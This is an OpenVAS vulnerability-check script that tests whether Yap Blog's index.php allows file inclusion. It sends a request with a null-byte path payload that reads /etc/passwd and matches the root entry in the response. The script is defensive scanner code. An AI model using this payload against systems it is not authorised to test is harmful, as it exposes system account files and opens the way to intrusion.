###############################################################################
# OpenVAS Vulnerability Test
# $Id: Yap_Blog_remote-file_include.nasl 124 2009-03-14 09:35:53Z mime $
#
# Yap Blog 'index.php' Remote File Include Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100046);
 script_bugtraq_id(28120);
 script_version ("1.0");

 script_name(english:"Yap Blog 'index.php' Remote File Include Vulnerability");
 desc["english"] = "

 Overview:
  Yap Blog is prone to a remote file-include vulnerability because it
  fails to sufficiently sanitize user-supplied input.

  Exploiting this issue may allow an attacker to compromise the
  application and the underlying system; other attacks are also
  possible.

  Versions prior to Yap Blog 1.1.1 are vulnerable. 

 See also:
  http://www.securityfocus.com/bid/28120

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if Yap Blog is vulnerable to Remote File Include");
 script_category(ACT_GATHER_INFO);
 script_family(english:"Web application abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dir = make_list("/blog","/yap",cgi_dirs());
foreach d (dir)
{ 
 url = string(d, "/index.php?page=/etc/passwd%00");
 req = http_get(item:url, port:port);
 buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
 if( buf == NULL )continue;

 if( egrep(pattern:"root:x:0:[01]:.*", string: buf) )
   {    
     security_warning(port:port);
     exit(0);
   } else {
     # etc/passwd not readeable. Perhaps windows or open basedir. Try
     # to include yap rss.php. If included this results in "Cannot
     # modify header..."
     url = string(d, "/index.php?page=rss.php%00");
     req = http_get(item:url, port:port);
     buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
     if( buf == NULL )continue;

     if( egrep(pattern:"Cannot modify header information - headers already sent.*", string: buf) )
     {
      security_warning(port:port);
      exit(0);
     }  
   }  
}
exit(0);
